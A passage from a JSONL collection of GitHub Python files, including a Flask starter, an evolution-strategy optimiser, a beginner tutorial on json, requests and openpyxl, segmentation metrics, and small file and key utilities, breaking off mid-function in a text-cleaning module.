self.prev_state = self.state\n self.state = ns\n \n init_func = '_init_' + ns\n self.check_and_call(self, init_func)\n \n\n \n def vprint(self, mes):\n if self.verbose:\n print('::Pycom::\\t' + mes)\n \n def _not_connected(self):\n self.vprint('Not connected')\n \n def exit_handler(self):\n self.vprint('Closing socket connections')\n self.sock.close()\n if self.serve_thread:\n self.serve_thread.terminate()\n self.server_proc.terminate()\n self.server_proc.join()\n self.serve_thread.join()\n\n","repo_name":"an0mali/Pycom","sub_path":"Pycom/pycom.py","file_name":"pycom.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17070259468","text":"import threading\n\nfrom flask import Flask\nfrom flask_injector import FlaskInjector\nfrom injector import singleton\n\nfrom api import rest, pages\nfrom core import domain\nfrom core.analyser import TweetAnalyser\n\napp = Flask(__name__)\n\n\ndef start(db, ta):\n # Initialize Flask-Injector. This needs to be run *after* you attached all\n # views, handlers, context processors and template globals.\n app.register_blueprint(rest.bp)\n app.register_blueprint(pages.bp)\n\n def module(binder):\n binder.bind(\n domain.Database,\n to=db,\n scope=singleton,\n )\n binder.bind(\n TweetAnalyser,\n to=ta,\n scope=singleton,\n )\n\n FlaskInjector(app=app, modules=[module], )\n\n app.run('0.0.0.0', port=5001)\n\n thread = threading.Thread(target=start, args=())\n thread.daemon = True # Daemonize thread\n thread.start()\n\n","repo_name":"CodeforLancaster/sitegeist","sub_path":"api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8488287910","text":"'''\nCreated on 09/09/2014\n@author: azu\n'''\nfrom practices.first.evolutionaryStrategies.fitness import *\n\n\ndef initialize(number):\n return [[np.float(random.gauss(0, 100)) for i in range(number)] for u in range(1)]\n\n\ndef mutate(variables, generation, numberOfVariables):\n return [variables[i] + sigma[generation] * random.gauss(0, 1) for i in range(numberOfVariables)]\n\n\ndef success(replacement, generation, numberOfVariables):\n ps = replacement / float(generation)\n if (generation % numberOfVariables == 0):\n if (ps > 1 / 5.0):\n return sigma[generation - numberOfVariables] / 0.817\n if (ps < 1 / 5.0):\n return sigma[generation - numberOfVariables] * 0.817\n if (ps == 1 / 5.0):\n return sigma[generation - numberOfVariables]\n else:\n return sigma[generation - 1]\n\n\ndef select(fitnessArray, mode):\n f = fitnessArray[:]\n f.sort()\n middleValue = f.pop(len(f) / 2)\n selected = {'best': fitnessArray.index(min(fitnessArray)),\n 'worst': fitnessArray.index(max(fitnessArray))}\n return selected[mode]\n\n\ndef onePlusOne(func):\n print(\"\\nES: u+1 \\tFunction: %s\" % (func))\n generation = 0\n replacement = 0\n ps = 0\n num = numberOfVariables[func]\n comparison = 1\n variables = initialize(num)\n fitnessArray = [function[func](variables[u]) for u in range(1)]\n best = select(fitnessArray, 'best')\n while (generation < maxGenerations and sigma[generation] > epsilon and min(fitnessArray) > float('-inf')):\n actualBest = min(fitnessArray)\n selectedIndex = select(fitnessArray, 'best')\n offspring = mutate(variables[selectedIndex], generation, num)\n fitnessSon = function[func](offspring)\n worst = select(fitnessArray, 'worst')\n if (fitnessSon < fitnessArray[worst]): # Son better than worst dad\n variables[worst] = offspring\n fitnessArray[worst] = fitnessSon\n replacement += 1\n if (actualBest > min(fitnessArray)):\n comparison = abs(actualBest - min(fitnessArray))\n generation += 1\n if (generation < maxGenerations):\n sigma[generation] = success(replacement, generation, num)\n best = select(fitnessArray, 'best')\n print(variables[best], fitnessArray[best], generation, sigma[generation], comparison)\n if (num > 1):\n print(imageMaker(number_of_variables=num, function_id=func, name=str(func) + \"_onePlusOne\",\n point=([variables[best][0]], [variables[best][1]], [fitnessArray[best]])))\n else:\n print(imageMaker(number_of_variables=num, function_id=func, name=str(func) + \"_onePlusOne\",\n point=(variables[best], [fitnessArray[best]])))\n return \"Vars: %s Fitness: %s Generations: %d\" % (variables[best], fitnessArray[best], generation)\n\n #onePlusOne(0)","repo_name":"jresendiz27/EvolutionaryComputing","sub_path":"practices/first/evolutionaryStrategies/onePlusOne.py","file_name":"onePlusOne.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70598974826","text":"import datetime\nimport time\nimport json\nimport random\nimport math\nimport requests\nimport openpyxl\nfrom openpyxl.utils import get_column_letter\nimport os\n\n# print(datetime.datetime.now()) # 2022-12-03 10:38:24.112871\n# time.sleep(5.5) # задержка\n# print(datetime.datetime.now())\n\n# сериализация\n# десериализация\n\ndict1 = {\n \"key\": \"value\",\n \"name\": 'Bogdan',\n \"age\": 25,\n \"teacher\": True,\n \"subjects\": [\"Python\", \"Django\"]\n}\nprint(dict1)\njson_str = json.dumps(dict1)\nprint(json_str)\nprint(type(json_str))\n\n# file = open(\"new.json\", \"w\")\n# file.write(json_str)\n# file.close()\n\nwith open(\"new.json\", \"w\", encoding='utf8') as file:\n file.write(json_str)\n # json.dump(dict1, file)\n\n\nwith open(\"new.txt\", \"w\", encoding='utf8') as file:\n file.write(\"Привет\")\n\nwith open(\"new.json\", \"rb\") as file:\n # data = file.read()\n # print(data, type(data))\n dict2 = json.load(file)\n # dict2 = json.loads('''{\"key\": \"value\", \"name\": \"Bogdan\", \"age\": 25, \"teacher\": true, \"subjects\": [\"Python\", \"Django\"]}''')\n print(dict2, type(dict2))\n\n\nprint(random.randint(10, 100))\nprint(round(random.random() * 100, 2)) # 0.0 ... 1.0\nprint(math.floor(25.6)) # int\nprint(math.sqrt(25)) # 5.0\nprint(math.e) # 2.718281828459045\n\n# http - транспортный протокол\nurl = \"https://jsonplaceholder.typicode.com/todos/1\"\ndata = requests.get(url=url)\nprint(data, type(data)) # \n\nprint(data.content)\ncon = b'{\\n \"userId\": 1,\\n \"id\": 1,\\n \"title\": \"delectus aut autem\",\\n \"completed\": false\\n}'\n\nprint(data.text, type(data.text))\ntext = '{\"userId\": 1,\"id\": 1,\"title\": \"delectus aut autem\",\"completed\": false}'\n\nprint(data.json(), type(data.json())) # {'userId': 1, 'id': 1, 'title': 'delectus aut autem', 'completed': False} \ndict_data = data.json()\n\n# with open(\"newnew.json\", \"wb\") as file:\n# file.write(requests.get(url=\"https://jsonplaceholder.typicode.com/todos/66\").content)\n\nage = 20\nmessage = \"I'm \" + str(age) + \" age!\"\nmessage2 = f\"I'm {age} age!\"\nprint(message2)\n\n# json_array = requests.get(url=\"https://jsonplaceholder.typicode.com/todos\").json()\n#\n# for obj in json_array:\n# print(obj, type(obj))\n# with open(f'temp/new{obj[\"id\"]}.json', \"w\") as file:\n# # file.write(json.dumps(obj))\n# json.dump(obj, file)\n\nprint(\"\\n\\n\\n\\n************\\n\\n\\n\\n\")\n\n# CRUD - create read update\nworkbook = openpyxl.load_workbook(\"new.xlsx\")\nworksheet = workbook.active\n\ncell1 = worksheet[\"C2\"]\nprint(cell1) # \nprint(cell1.value) # b_3\n\nlist5 = []\nfor number in range(1, 3+1):\n list5.append(worksheet[f\"A{number}\"].value)\nprint(list5)\n\nmatrix = []\nrows = []\nfor row in range(1, worksheet.max_row + 1):\n local_rows = []\n for column in range(1, worksheet.max_column + 1):\n # value = worksheet[f\"{get_column_letter(column)}{row}\"].value\n local_rows.append(worksheet.cell(row, column).value)\n rows.append(local_rows)\nprint(rows)\n\nvl = None\nvl1 = \"\"\nvl2 = False\n\n\nnew_workbook = openpyxl.Workbook()\n\nnew_worksheet = new_workbook.active\n\nindex = 0\nfor row in rows:\n for value in row:\n index += 1\n new_worksheet.cell(index, 1, value)\n\nnew_workbook.save(\"create.xlsx\")\n","repo_name":"bogdandrienko/PyE-222-1","sub_path":"projects/2/new/new2.py","file_name":"new2.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9789048008","text":"from collections import defaultdict as dc \r\nt=lambda:map(int,input().split())\r\nn,x=t()\r\na=list(t())\r\nd=dc(list)\r\nfor i in range(n):\r\n for j in range(i+1,n):\r\n d[a[i]+a[j]]+=[i,j]\r\nfor i in range(n-1):\r\n for j in range(i+1,n):\r\n s=a[i]+a[j]\r\n if x-s not in d:\r\n continue\r\n p=d[x-s]\r\n if p[0]!=i and p[0]!=j and p[1]!=i and p[1]!=j:\r\n print(i+1,j+1,p[0]+1,p[1]+1)\r\n exit()\r\nprint(\"IMPOSSIBLE\")\r\n","repo_name":"charlie219/CSES-Solutions","sub_path":"Sorting and Searching/Sum of Four Values.py","file_name":"Sum of Four Values.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7906922261","text":"import os\nimport numpy as np\nimport cv2\n\ndef load_images(folder):\n images = []\n for filename in sorted(os.listdir(folder)):\n img = cv2.imread(os.path.join(folder, filename))\n img = img/255\n if img is not None:\n images.append(img)\n return images\n\n\ndef calculate_precision(predicted_outputs, ground_truths):\n\n predicted_outputs = predicted_outputs > 0.5\n ground_truths = ground_truths > 0.5\n\n # assert predicted_outputs.shape == ground_truths.shape, \"Both masks should have the same shape.\"\n\n # Calculate true positives (TP)\n TP = np.sum(np.logical_and(predicted_outputs == 1, ground_truths == 1))\n\n # Calculate false positives (FP)\n FP = np.sum(np.logical_and(predicted_outputs == 1, ground_truths == 0))\n\n # Calculate precision\n precision = TP / (TP + FP) if (TP + FP) > 0 else 0\n\n return precision\n\ndef calculate_recall(predicted_outputs, ground_truths):\n\n predicted_outputs = predicted_outputs > 0.5\n ground_truths = ground_truths > 0.5\n\n # assert predicted_outputs.shape == ground_truths.shape, \"Both masks should have the same shape.\"\n\n # Calculate true positives (TP)\n TP = np.sum(np.logical_and(predicted_outputs == 1, ground_truths == 1))\n\n # Calculate false negatives (FN)\n FN = np.sum(np.logical_and(predicted_outputs == 0, ground_truths == 1))\n \n # Calculate recall\n recall = TP / (TP + FN) if (TP + FN) > 0 else 0\n\n return recall\n\ndef calculate_mae(predicted_outputs, ground_truths):\n mae_values = []\n for pred, gt in zip(predicted_outputs, ground_truths):\n mae = np.mean(np.abs(pred.astype(np.float32) - gt.astype(np.float32)))\n # print(\"mae: = \", mae)\n mae_values.append(mae)\n return mae_values\n\ndef calculate_fbeta_score(predicted_outputs, ground_truths, beta):\n fbeta_values = []\n for pred, gt in zip(predicted_outputs, ground_truths):\n precision = calculate_precision(pred, gt)\n recall = calculate_recall(pred, gt)\n # print(\"Recall: = \", recall)\n # print(\"Precision: =\", precision)\n if precision + recall == 0:\n fbeta_score = 0\n else:\n fbeta_score = (1 + beta) * (precision * recall) / (beta * precision + recall)\n fbeta_values.append(fbeta_score)\n\n return np.mean(fbeta_values)\n\npredicted_outputs_folder = \"/home/pvnatu/mihir/dl/Attention_U2Net/data/DUTS_test/u2net_results\"\nground_truths_folder = \"/home/pvnatu/mihir/dl/Attention_U2Net/data/DUTS_test/DUTS_testlabel\"\n\npredicted_outputs = load_images(predicted_outputs_folder)\nground_truths = load_images(ground_truths_folder)\n\nmae_values = calculate_mae(predicted_outputs, ground_truths)\nfbera_score = calculate_fbeta_score(predicted_outputs, ground_truths, 0.3)\n\naverage_mae = np.mean(mae_values)\nprint(f\"Average MAE for all 1000 images: {average_mae:.4f}\")\nprint(\"Fbeta: = \", fbera_score)","repo_name":"vaibhav02kadam/Attention-U2Net","sub_path":"Attention U2Net/Attention U2Net/calc_mae.py","file_name":"calc_mae.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38103519945","text":"def savePrivateKey(private_key):\n print(\"\\n~~~ Save Private Key ~~~\")\n print(\"masukkan nama file (cth: namefile -> namefile.pri): \", end='')\n file_name = input()\n f = open(\"private_keys/\"+file_name+\".pri\", 'w')\n f.write(str(private_key))\n f.close()\n print(\"~~~~~~\\n\")\n\n\ndef openPrivateKey():\n print(\"\\n~~~ Load Private Key ~~~\")\n print(\"masukkan nama file private key \\ndi folder private_keys (yang ada .pri nya): \", end='')\n file_name = input()\n try:\n f = open(\"private_keys/\"+file_name, 'r')\n content = f.read()\n f.close()\n return stringtokey(content)\n except:\n print(\"~~~~~~\\n\")\n print(\"ngga ada nama file itu di folder private_keys, nyaa~\")\n \n print(\"~~~~~~\\n\")\n \ndef saveSignFile(content):\n print(\"\\n~~~ Save Sign File ~~~\")\n print(\"masukkan nama file (cth: namefile -> namefile.txt): \", end='')\n file_name = input()\n f = open(\"file/\"+file_name+\".txt\", 'w')\n f.write(str(content))\n f.close()\n print(\"file tersimpan pada: \", \"file/\"+file_name+\".txt\")\n print(\"~~~~~~\\n\")\n\ndef openSignFile():\n print(\"\\n~~~ Load Sign File ~~~\")\n print(\"masukkan nama file sign \\ndi folder file: \", end='')\n file_name = input()\n try:\n f = open(\"file/\"+file_name, 'r')\n content = f.read()\n f.close()\n print(\"~~~~~~\\n\")\n return content\n except:\n print(\"ngga ada nama file itu di folder file, nyaa~\")\n \n print(\"~~~~~~\\n\")\n\ndef openFile():\n print(\"\\n~~~ Load File ~~~\")\n print(\"masukkan nama file \\ndi folder file: \", end='')\n file_name = input()\n try:\n f = open(\"file/\"+file_name, 'rb')\n content = f.read()\n f.close()\n print(\"~~~~~~\\n\")\n return content\n except:\n print(\"ngga ada nama file itu di folder file, nyaa~\")\n \n print(\"~~~~~~\\n\")\n \n\n\ndef stringtokey(stringkey:str):\n '''\n Mengembalikan nilai key dari key yg dalam bentuk string\n '''\n key_temp = (stringkey.replace(')', '')).split('(')[1]\n k = key_temp.split(', ')[0]\n n = key_temp.split(', ')[1].replace(\"'\", '')\n key = int(k), int(n)\n return key","repo_name":"FlitzyBlue332/kripto-makalah","sub_path":"src/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3774417989","text":"\"\"\"\nWe are given a row wise sorted matrix of size r*c, we need to find the median of the matrix given. It is assumed that r*c is always odd.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Each test case contains two integers r and c, where r is the number of rows and c is the number of columns in the array a[]. Next r line contains space separated c elements each in the array a[].​\n\nOutput:\nPrint an integer which is the median of the matrix.\n\nConstraints:\n1<= T <=100\n1<= r,c <=150\n1<= a[i][j] <=1000\n\nExample:\nInput:\n1\n3 3\n1 3 5\n2 6 9\n3 6 9\n\nOutput:\n5\n\"\"\"\n\ntCases = int(input())\nfor _ in range(tCases):\n m, n = map(int, input().split())\n l = list(map(int, input().split()))\n l.sort()\n print(l[(n*m//2)])","repo_name":"amit-kr-debug/CP","sub_path":"Geeks for geeks/array/Median In a Row-Wise sorted Matrix.py","file_name":"Median In a Row-Wise sorted Matrix.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40522905952","text":"import sys\nimport numpy as np\nfrom pathlib import Path\n\n#file = Path('txt-kopi.txt')\n#file.write_text(file.read_text().replace('-e', ''))\n\nA=np.loadtxt(\"AAA.txt\",dtype=\"str\")\nAA=list(A)\nprint(len(AA))\n\nB=np.loadtxt(\"BBB.txt\",dtype=\"str\")\nBB=list(B)\nprint(len(BB))\n\n\nprint(\"start\")\nvalue = len(AA)\ncounter=1\n\nfor i in BB:\n if i in AA:\n BB.remove(i)\n counter += 1\n procent = counter/value*100\n print(\"C : \"+str(counter)+\" --- \"+str(procent)+\"%\" )\n \nprint(str(BB))\n\nwith open(\"Result.txt\", \"a\") as file_object:\n file_object.write(str(BB))\n\nprint(\"End\")\n","repo_name":"AnxiousLuna/replace_from_txtFile","sub_path":"replace_from_txtFile.py","file_name":"replace_from_txtFile.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71535658669","text":"def solution(stats, k):\n \"\"\"\n :param stats: list\n :param k: int\n :return: list\n \"\"\"\n da = {}\n for stat in stats:\n if stat in da:\n da[stat] += 1\n else:\n da[stat] = 1\n\n sa = list(sorted(list(set(stats))))\n\n ans_n = 0\n ans_l = -1\n ans_r = -1\n\n cur_n = 0\n cur_l = -1\n cur_r = -1\n\n for i in sa:\n if cur_r == i - 1 and da[i] >= k:\n cur_n += 1\n cur_r += 1\n else:\n if cur_n > ans_n:\n ans_n = cur_n\n ans_l = cur_l\n ans_r = cur_r\n cur_n = 1 if da[i] >= k else 0\n cur_l = i if da[i] >= k else -1\n cur_r = i if da[i] >= k else -1\n\n if cur_n > ans_n:\n ans_n = cur_n\n ans_l = cur_l\n ans_r = cur_r\n\n if ans_n == 0:\n return -1\n else:\n return ans_l + ans_r\n","repo_name":"devYuMinKim/coding_test_with_javascript","sub_path":"20221019/모범답안/20221019_06/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42718223022","text":"from collections import defaultdict\nimport copy\n\ndef main(filename):\n s = open(filename, \"r\").read()\n ml=4\n for i in range(ml,len(s)):\n if(len(set(s[i-ml:i])) == ml):\n print(\"p1: \"+str(i))\n break\n ml=14\n for i in range(ml-1,len(s)):\n if(len(set(s[i-ml:i])) == ml):\n print(\"p2: \"+str(i))\n break\n \n\nif __name__ == \"__main__\":\n main(\"input_t1\")\n main(\"input\")\n","repo_name":"cosmicnotepin/aoc2022","sub_path":"day_6/1/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12995213341","text":"#!/usr/bin/env python3\n# encoding:utf-8\n\n\nimport sys\nimport numpy as np\nimport cv2 as cv\n\ndef main():\n # 设置视频的宽度和高度\n frame_size = (320, 240)\n\n # 设置帧率\n fps = 25\n\n # 视频编解码格式\n fourcc = cv.VideoWriter_fourcc('M','J','P','G')\n\n # 创建writer\n writer = cv.VideoWriter(\"myvideo.avi\", fourcc, fps, frame_size)\n # 检查是否创建成功\n if writer.isOpened() == False:\n print(\"Error creating video writer.\")\n sys.exit()\n\n for i in range(0, 100):\n\n # 设置视频帧画面\n im = np.zeros((frame_size[1], frame_size[0], 3), dtype=np.uint8)\n\n # 将数字绘制到画面上\n cv.putText(im, str(i), (int(frame_size[0]/3), int(frame_size[1]*2/3)), cv.FONT_HERSHEY_SIMPLEX, 3.0, (255, 255, 255), 3)\n\n # 保存视频帧到文件\"myvideo.avi\"\n writer.write(im)\n\n # 释放writer\n writer.release()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OpenCVChina/OpenCVBookSourceCode","sub_path":"01-图像的基本操作/video_write.py","file_name":"video_write.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"33760377828","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020-10-05 15:28\n @Author : QDY\n @FileName: 633. 平方数之和.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n给定一个非负整数c,你要判断是否存在两个整数 a 和 b,使得a2 + b2 = c 。\n\n示例 1:\n输入:c = 5\n输出:true\n解释:1 * 1 + 2 * 2 = 5\n\n示例 2:\n输入:c = 3\n输出:false\n\n示例 3:\n输入:c = 4\n输出:true\n\n示例 4:\n输入:c = 2\n输出:true\n\n示例 5:\n输入:c = 1\n输出:true\n\n提示:\n0 <= c <= 231 - 1\n\n\"\"\"\n\n\nclass Solution:\n def judgeSquareSum(self, c: int) -> bool:\n # ss = set()\n # for i in range(int(c**0.5)+1):\n # tmp = i**2\n # ss.add(tmp)\n # if c-tmp in ss:return True\n # return False\n # l, r = 0, int(c**0.5) # 双指针\n # ll, rr = 0, r*r\n # while l<=r:\n # if ll + rr == c:return True\n # elif ll+rr < c:\n # l += 1\n # ll = l**2\n # else:\n # r -= 1\n # rr = r**2\n # return False\n\n # 一个非负整数 c 能够表示为两个整数的平方和,当且仅当 c 的所有形如 4k+3 的质因子的幂次均为偶数。\n if c <= 2: return True\n factor = 2\n while factor ** 2 <= c:\n if c % factor == 0:\n cnt = 0\n while c % factor == 0:\n c //= factor\n cnt += 1\n if factor % 4 == 3 and cnt & 1: return False\n factor += 1\n return c % 4 != 3 # 最后剩下的因子,幂次为1,不能是4k+3的形式\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/633. 平方数之和.py","file_name":"633. 平方数之和.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13672762409","text":"from configparser import ConfigParser\nimport os\nimport subprocess\nimport shutil\nimport glob\n\nheaderFolder = \"DFPAC\"\ntestPrefix = \"Test_\"\nroot = os.getcwd()\noutputDir = root + \"/bin/\"\nextrasDir = root + \"/extras/\"\ntestDir = root + \"/tests/\"\nsrcDir = root + \"/src/\"\n\njunkFileExtension = '.o'\nlibFileExtension = '.a'\n\n#shutil.rmtree(outputDir)\nif not os.path.exists(outputDir):\n os.mkdir(outputDir)\n\nif not os.path.exists(outputDir + headerFolder):\n os.mkdir(outputDir + headerFolder)\n\n#print(config[\"PLATFORM\"])\n\n\n\nmakeResult = subprocess.run([\"make\"], shell=True, cwd=srcDir)\nfor object in glob.iglob(os.path.join(srcDir, '*' + junkFileExtension)):\n os.remove(object)\nfor lib in glob.iglob(os.path.join(srcDir, '*' + libFileExtension)):\n shutil.copy(lib, outputDir)\n shutil.copy(lib, testDir)\nfor header in glob.iglob(os.path.join(srcDir, '*.h')):\n shutil.copy(header, outputDir + headerFolder)\n #print(makeResult)\n \n\n#this is not important and was throwing too many errors\n#generate needed csv files if needed\n#if not os.path.isfile(testDir + \"Test_DFPAC/Test.csv\"):\n #result = subprocess.run([\"python3 \" + extrasDir + \"GenerateTestData.py\"], shell=True, cwd=currentDir)\n #print(result)\n #shutil.copy(extrasDir + \"Test.csv\", testDir + \"Test_DFPAC/\")\n\nprint(\"************Testing************\")\n\n\ncurrentDir = testDir\nprint(currentDir)\nmakeResult = subprocess.run([\"make\"], shell=True, cwd=currentDir)\nmakeResult = subprocess.run([currentDir + '/' + 'Test_DFPAC.out'], shell=True, cwd=currentDir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nprint(\"test process completed. A copy of the test outputs can be found at /tests/DFTests.txt\")\nif(makeResult.returncode == 0):\n print(\"tests completed correctly printing results\")\nelse:\n print(\"tests did not complete\")\n print(makeResult)\n print(\"pritning results\")\n\nprint('\\n\\n\\n\\n\\n')\n\nwith open(\"./tests/DFTests.txt\", 'r') as f:\n print(f.read())\n\n\nprint(\"jobs done\")","repo_name":"PierceCappa/DataFramePAC","sub_path":"CompileTest.py","file_name":"CompileTest.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20967369974","text":"msg = [\"Enter an equation\",\n \"Do you even know what numbers are? Stay focused!\",\n \"Yes ... an interesting math operation. \"\n \"You've slept through all classes, haven't you?\",\n \"Yeah... division by zero. Smart move...\",\n \"Do you want to store the result? (y / n):\",\n \"Do you want to continue calculations? (y / n):\",\n \" ... lazy\",\n \" ... very lazy\",\n \" ... very, very lazy\",\n \"You are\",\n \"Are you sure? It is only one digit! (y / n)\",\n \"Don't be silly! It's just one number! Add to the memory? (y / n)\",\n \"Last chance! Do you really want to embarrass yourself? (y / n)\"]\nmemory = 0.0\n\n\ndef read_calc():\n global memory\n\n print(msg[0])\n user_input = input().split()\n\n op = user_input[1]\n\n x = user_input[0]\n if x == \"M\":\n x = str(memory)\n\n y = user_input[2]\n if y == \"M\":\n y = str(memory)\n\n calc = (op, x, y)\n return calc\n\n\ndef sanitize(arg):\n if arg[1].isalpha() or arg[2].isalpha():\n print(msg[1])\n return False\n if not str(arg[0]).endswith((\"+\", \"-\", \"*\", \"/\")):\n print(msg[2])\n return False\n else:\n return True\n\n\ndef operation(calc):\n check(calc[1], calc[2], calc[0])\n op_result = 0\n if calc[0] == \"+\":\n op_result = float(calc[1]) + float(calc[2])\n elif calc[0] == \"-\":\n op_result = float(calc[1]) - float(calc[2])\n elif calc[0] == \"*\":\n op_result = float(calc[1]) * float(calc[2])\n elif calc[0] == \"/\":\n if float(calc[2]) != 0.0:\n op_result = float(calc[1]) / float(calc[2])\n else:\n print(msg[3])\n return \"notTrue\"\n\n return op_result\n\n\ndef result():\n calc = read_calc()\n while not sanitize(calc):\n calc = read_calc()\n inner_result = operation(calc)\n while inner_result == \"notTrue\":\n calc = read_calc()\n while not sanitize(calc):\n calc = read_calc()\n inner_result = operation(calc)\n return inner_result\n\n\ndef save(outer_result):\n global memory\n print(msg[4])\n user_input = input()\n if user_input == \"y\":\n memory_is_tight(outer_result)\n\n\ndef memory_is_tight(v):\n global memory\n if not is_one_digit(v):\n memory = v\n else:\n index = 10\n while True:\n print(msg[index])\n user_input = input()\n if user_input != \"y\":\n break\n if index >= 12:\n memory = v\n break\n index = index + 1\n\n\ndef keepup():\n print(msg[5])\n user_input = input()\n if user_input == \"y\":\n main()\n else:\n quit()\n\n\ndef is_one_digit(v):\n if -10 < float(v) < 10 and float(v).is_integer():\n return True\n else:\n return False\n\n\ndef check(v1, v2, v3):\n global msg\n inner_msg = \"\"\n\n if is_one_digit(v1) and is_one_digit(v2):\n inner_msg = inner_msg + msg[6]\n\n if (float(v1) == 1 or float(v2) == 1) and v3 == \"*\":\n inner_msg = inner_msg + msg[7]\n\n if (float(v1) == 0 or float(v2) == 0) \\\n and (v3 == \"*\" or v3 == \"+\" or v3 == \"-\"):\n inner_msg = inner_msg + msg[8]\n\n if inner_msg != \"\":\n inner_msg = msg[9] + inner_msg\n\n print(inner_msg)\n\n\ndef main():\n global memory\n outer_result = result()\n print(outer_result)\n save(outer_result)\n keepup()\n\n\nmain()\n","repo_name":"mazzog/Python-Projects","sub_path":"honestCalculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36482211218","text":"__author__ = \"Cody Precord \"\n__svnid__ = \"$Id$\"\n__revision__ = \"$Revision$\"\n\n__all__ = [ 'IsUnicode', 'DecodeString']\n\n#-----------------------------------------------------------------------------#\n# Imports\nimport types\n\n#-----------------------------------------------------------------------------#\n\ndef IsUnicode(txt):\n \"\"\"Is the given string a unicode string\n @param txt: object\n @return: bool\n\n \"\"\"\n return isinstance(txt, types.UnicodeType)\n\ndef DecodeString(txt, enc):\n \"\"\"Decode the given string with the given encoding,\n only attempts to decode if the given txt is not already Unicode\n @param txt: string\n @param enc: encoding 'utf-8'\n @return: unicode\n\n \"\"\"\n if IsUnicode(txt):\n txt = txt.decode(enc)\n return txt\n","repo_name":"wxWidgets/wxPython-Classic","sub_path":"wx/tools/Editra/src/ebmlib/txtutil.py","file_name":"txtutil.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"37"} +{"seq_id":"43377617337","text":"class Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0:\n return False\n origin = x\n reverse = 0\n while x > 0:\n reverse = reverse * 10 + x % 10\n if reverse >= math.pow(2, 31):\n return False\n x = x / 10\n return (reverse == origin) \n","repo_name":"julienbin/leetcode","sub_path":"009_Palindrome_Number/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26129921071","text":"from pymongo import MongoClient\nimport datetime\nimport traceback\nfrom dotenv import load_dotenv\nimport os\n\n# 패키지 설치\n# pip install pymongo\n\nclass MongoDB_API:\n def __init__(self):\n load_dotenv(verbose=True)\n self.MONGO_PWD = os.getenv('MONGO_PWD')\n self.client = MongoClient(f'mongodb://temple:{self.MONGO_PWD}@localhost:27017/ArcadeData')\n self.log_db = self.client['ArcadeData']['log']\n\n def add_log(self, user_name, v_id, progress_time, arcade_type):\n try:\n content = {\n 'log_time': datetime.datetime.utcnow(),\n 'user_name': user_name,\n 'v_id': v_id,\n 'check_time': progress_time,\n 'arcade_type': arcade_type,\n }\n post_id = self.log_db.insert_one(content).inserted_id\n print(f'[OK] 새 데이터가 등록되었습니다. post_id : \"{post_id}\"')\n return None\n except:\n print(f'[Error] DB 데이터 추가 에러\\n{traceback.format_exc()}')\n return '[Failed] DB 데이터 추가 실패'\n \n def find_log(self):\n return self.log_db.find({}, {'_id': False}).sort('log_time')","repo_name":"Temple2001/arcade-manager","sub_path":"backend_python/db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32028152260","text":"import os\nimport pickle\nimport pandas as pd\nimport html as ihtml\nfrom bs4 import BeautifulSoup\nimport gensim\nimport spacy\n\nnlp = spacy.load(\"en_core_web_md\")\n# MIN_SIM_SCORE = 0.5\nN_DOCS = 10\n\nfrom data_loaders import BASE_DIR, DALITE_DISCIPLINES\nfrom utils_scrape_openstax import OPENSTAX_TEXTBOOK_DISCIPLINES\n\n# https://www.kaggle.com/ceshine/remove-html-tags-using-beautifulsoup\ndef clean_text(text):\n text = BeautifulSoup(ihtml.unescape(text)).text\n # text = re.sub(r\"http[s]?://\\S+\", \"\", text)\n # text = re.sub(r\"\\s+\", \" \", text)\n return 